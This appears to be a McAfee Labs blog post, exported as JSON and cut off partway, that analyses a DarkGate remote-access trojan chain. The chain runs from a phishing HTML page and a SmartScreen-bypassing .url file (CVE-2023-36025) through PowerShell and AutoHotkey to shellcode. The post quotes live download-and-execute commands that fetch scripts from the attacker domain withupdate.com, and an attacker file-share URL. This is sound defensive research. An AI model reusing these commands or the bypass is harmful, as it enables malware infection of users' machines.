{"id":190356,"date":"2024-04-29T11:09:03","date_gmt":"2024-04-29T18:09:03","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=190356"},"modified":"2024-04-29T11:09:03","modified_gmt":"2024-04-29T18:09:03","slug":"the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","title":{"rendered":"The Darkgate Menace: Leveraging Autohotkey &#038; Attempt to Evade Smartscreen"},"content":{"rendered":"<p><em>Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena<\/em><\/p>\n<p>McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190357 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture1.png\" alt=\"\" width=\"544\" height=\"353\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture1.png 544w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture1-300x195.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture1-199x129.png 199w\" sizes=\"auto, (max-width: 544px) 100vw, 544px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 1: Geo-Distribution of DarkGate<\/p>\n<h2><strong>DarkGate\u2019s attempt to bypass Defender Smartscreen<\/strong><\/h2>\n<p>Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.<\/p>\n<p>In the previous year, CVE-2023-36025 (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025<\/a> ) was identified and subsequently patched <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025\" target=\"_blank\" rel=\"noopener\">https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025<\/a> . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (<a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-21412\" target=\"_blank\" rel=\"noopener\">https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-21412<\/a> ) was identified and patched. This vulnerability is about \u201cInternet Shortcut Files Security Feature Bypass Vulnerability\u201d.<\/p>\n<h2><strong>Infection Chain<\/strong><\/h2>\n<p>McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190372 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture2.png\" alt=\"\" width=\"626\" height=\"400\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture2.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture2-300x192.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture2-202x129.png 202w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 2: Infection Chain<\/p>\n<h2><strong>Infection from HTML:<\/strong><\/h2>\n<p>The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in &#8220;Cloud View&#8221; (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190387 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture3.png\" alt=\"\" width=\"626\" height=\"288\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture3.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture3-300x138.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture3-205x94.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 3: HTML page<\/p>\n<p>Upon clicking &#8220;Cloud View,&#8221; users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190402 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture4.png\" alt=\"\" width=\"416\" height=\"176\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture4.png 416w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture4-300x127.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture4-205x87.png 205w\" sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 4: Prompt confirming redirection to Windows Explorer<\/p>\n<p>Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays &#8220;\\\\onedrive.live.com,&#8221; adding a veneer of legitimacy to the purported &#8220;Cloud View&#8221; experience.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190417 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture5.png\" alt=\"\" width=\"626\" height=\"135\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture5.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture5-300x65.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture5-205x44.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\">Figure 5: Share Internet Shortcut via SMB<\/p>\n<p>In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190432 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture6.png\" alt=\"\" width=\"782\" height=\"246\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture6.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture6-300x94.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture6-768x242.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture6-205x64.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 6: Javascript in HTML code<\/p>\n<p>On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190447 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture7.png\" alt=\"\" width=\"782\" height=\"346\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture7.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture7-300x133.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture7-768x340.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture7-205x91.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/p>\n<p style=\"text-align: center;\">Figure 7: WebDAV share<\/p>\n<p>The URL utilizes the &#8220;search-ms&#8221; application protocol to execute a search operation for a file named &#8220;Report-26-2024.url&#8221;. The &#8220;crumb&#8221; parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the &#8220;DisplayName&#8221; element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate &#8220;onedrive.live.com&#8221; folder, thereby facilitating deception.<\/p>\n<p>Hence, the presence of &#8220;onedrive.live.com&#8221; in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.<\/p>\n<p>The file is an Internet Shortcut (.url) file, containing the following content:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190462 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture8.png\" alt=\"\" width=\"626\" height=\"164\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture8.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture8-300x79.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture8-205x54.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 8: content of .URL file<\/p>\n<p>The .url files serve as straightforward INI configuration files, typically consisting of a &#8220;URL=&#8221; parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file:\/\/170.130.55.130\/share\/a\/Report-26-2024.zip\/Report-26-2024.vbs.<\/p>\n<p>Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.<\/p>\n<p>The vulnerability CVE-2023-36025 (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025<\/a> ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025\" target=\"_blank\" rel=\"noopener\">https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025<\/a> to address this vulnerability, it remains exploitable in unpatched versions of Windows.<\/p>\n<p>If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190477 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture9.png\" alt=\"\" width=\"341\" height=\"319\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture9.png 341w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture9-300x281.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture9-138x129.png 138w\" sizes=\"auto, (max-width: 341px) 100vw, 341px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 9: SmartScreen prompt<\/p>\n<p>On allowing execution, the vbs file is dropped at C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190492 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture10.png\" alt=\"\" width=\"626\" height=\"82\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture10.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture10-300x39.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture10-205x27.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 10: Process tree<\/p>\n<p>Following are the command lines:<\/p>\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WScript.exe&#8221; &#8220;C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs&#8221;\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -Command Invoke-Expression (Invoke-RestMethod -Uri &#8216;withupdate.com\/zuyagaoq&#8217;)\n<ul>\n<li>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1<\/li>\n<li>&#8220;C:\\rjtu\\AutoHotkey.exe&#8221; C:\/rjtu\/script.ahk<\/li>\n<li>&#8220;C:\\Windows\\system32\\attrib.exe&#8221; +h C:\/rjtu\/<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The sequence of commands begins with the execution of the VBScript file located at &#8220;C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs&#8221;. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (&#8216;withupdate.com\/zuyagaoq&#8217;) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:\/rjtu\/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:\/rjtu\/).<\/p>\n<p>Inspecting the URL &#8220;withupdate.com\/zuyagaoq&#8221; explicitly allows for a detailed understanding of the infection flow:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190507 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture11.png\" alt=\"\" width=\"511\" height=\"339\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture11.png 511w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture11-300x199.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture11-194x129.png 194w\" sizes=\"auto, (max-width: 511px) 100vw, 511px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 11: Remote Script on the C2<\/p>\n<p style=\"text-align: center;\">This URL leads to a script:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190522 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture12.png\" alt=\"\" width=\"626\" height=\"108\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture12.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture12-300x52.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture12-205x35.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><br \/>\nFigure 12: Remote Script content<\/center>Reformatting, we get:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190537 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture13.png\" alt=\"\" width=\"782\" height=\"237\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture13.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture13-300x91.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture13-768x233.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture13-205x62.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 13: Remote script content<\/p>\n<p>Explanation of the script:<\/p>\n<ul>\n<li><strong>ni &#8216;C:\/rjtu\/&#8217; -Type Directory -Force<\/strong>: This command creates a new directory named &#8220;rjtu&#8221; in the root of the C drive if it doesn&#8217;t already exist.<\/li>\n<li><strong>cd &#8216;C:\/rjtu\/&#8217;<\/strong>: This changes the current directory to the newly created &#8220;rjtu&#8221; directory.<\/li>\n<li><strong>Invoke-WebRequest -Uri &#8220;http:\/\/withupdate.com\/oudowibspr&#8221; -OutFile &#8216;C:\/rjtu\/temp_AutoHotkey.exe&#8217;<\/strong>: This command downloads a file from the specified URL and saves it as &#8220;temp_AutoHotkey.exe&#8221; in the &#8220;rjtu&#8221; directory.<\/li>\n<li><strong>Invoke-WebRequest -Uri &#8220;http:\/\/withupdate.com\/rwlwiwbv&#8221; -OutFile &#8216;C:\/rjtu\/script.ahk&#8217;<\/strong>: This downloads a file named &#8220;script.ahk&#8221; from another specified URL and saves it in the &#8220;rjtu&#8221; directory.<\/li>\n<li><strong>Invoke-WebRequest -Uri &#8220;http:\/\/withupdate.com\/bisglrkb&#8221; -OutFile &#8216;C:\/rjtu\/test.txt&#8217;<\/strong>: This downloads a file named &#8220;test.txt&#8221; from yet another specified URL and saves it in the &#8220;rjtu&#8221; directory.<\/li>\n<li><strong>start &#8216;C:\/rjtu\/AutoHotkey.exe&#8217; -a &#8216;C:\/rjtu\/script.ahk&#8217;<\/strong>: This command starts the executable &#8220;AutoHotkey.exe&#8221; located in the &#8220;rjtu&#8221; directory and passes &#8220;script.ahk&#8221; file as an argument.<\/li>\n<li><strong>attrib +h &#8216;C:\/rjtu\/&#8217;<\/strong>: This sets the hidden attribute for the &#8220;rjtu&#8221; directory.<\/li>\n<\/ul>\n<p>Checking \u201cC:\/rjtu\u201d:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190552 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture14.png\" alt=\"\" width=\"513\" height=\"143\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture14.png 513w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture14-300x84.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture14-205x57.png 205w\" sizes=\"auto, (max-width: 513px) 100vw, 513px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 14: Dropped folder<\/p>\n<p>AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.<\/p>\n<p>To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).<\/p>\n<p>Following is the ahk script file content:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190567 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture15.png\" alt=\"\" width=\"376\" height=\"451\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture15.png 376w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture15-250x300.png 250w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture15-108x129.png 108w\" sizes=\"auto, (max-width: 376px) 100vw, 376px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 15: Content of .ahk script<\/p>\n<p>There are a lot of comments added in the script, simplifying the script, we get:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190582 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture16.png\" alt=\"\" width=\"626\" height=\"131\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture16.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture16-300x63.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture16-205x43.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 16: .ahk script after removing junk<\/p>\n<p>This script reads the content of &#8220;test.txt&#8221; into memory, allocates a memory region in the process&#8217;s address space, writes the content of &#8220;test.txt&#8221; as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in &#8220;test.txt&#8221;.<\/p>\n<p>Now, it&#8217;s confirmed that the shellcode resides within the contents of &#8220;test.txt&#8221;. This is how the text.txt appears:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190597 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture17.png\" alt=\"\" width=\"626\" height=\"290\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture17.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture17-300x139.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture17-205x95.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 17: Content of test.txt<\/p>\n<p style=\"text-align: center;\">We analyzed the memory in use for Autohotkey.exe.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190612 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture18.png\" alt=\"\" width=\"782\" height=\"131\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture18.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture18-300x50.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture18-768x129.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture18-205x34.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><br \/>\nFigure 18: Memory of running instance of AutoHotKey.exe<\/center>We dumped the memory associated with it and found that it was the same as the content in test.txt.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190627 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture19.png\" alt=\"\" width=\"626\" height=\"291\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture19.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture19-300x139.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture19-205x95.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 19: Memory dump of running AutoHotKey.exe same as test.txt<\/p>\n<p style=\"text-align: center;\">This is the shellcode present here. \u00a0The first 6 bytes are assembly instructions:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190642 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture20.png\" alt=\"\" width=\"654\" height=\"424\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture20.png 654w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture20-300x194.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture20-199x129.png 199w\" sizes=\"auto, (max-width: 654px) 100vw, 654px\" \/><\/center>Figure 20: Shellcode A in the beginning<\/p>\n<p>Following the jump instructions of 3bf bytes, we reach the same set of instructions again:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190657 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture21.png\" alt=\"\" width=\"782\" height=\"146\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture21.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture21-300x56.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture21-768x143.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture21-205x38.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 21: Same Shellcode A after jump<\/p>\n<p>This means another jump with be taken for another 3bf bytes:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190672 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture22.png\" alt=\"\" width=\"626\" height=\"109\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture22.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture22-300x52.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture22-205x36.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 22: Same Shellcode A one more time<\/p>\n<p>We have encountered same set of instructions again, taking another jump we reach to:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190687 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture23.png\" alt=\"\" width=\"782\" height=\"150\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture23.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture23-300x58.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture23-768x147.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture23-205x39.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 23: New Shellcode B found next.<\/p>\n<p>These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190702 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture24.png\" alt=\"\" width=\"623\" height=\"552\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture24.png 623w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture24-300x266.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture24-146x129.png 146w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 24: Shellcode B followed by PE file highlighted<\/p>\n<p>This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190717 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture25.png\" alt=\"\" width=\"782\" height=\"260\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture25.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture25-300x100.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture25-768x255.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture25-205x68.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 25: After debugging found next Shellcode C<\/p>\n<p>This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190732 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture26.png\" alt=\"\" width=\"578\" 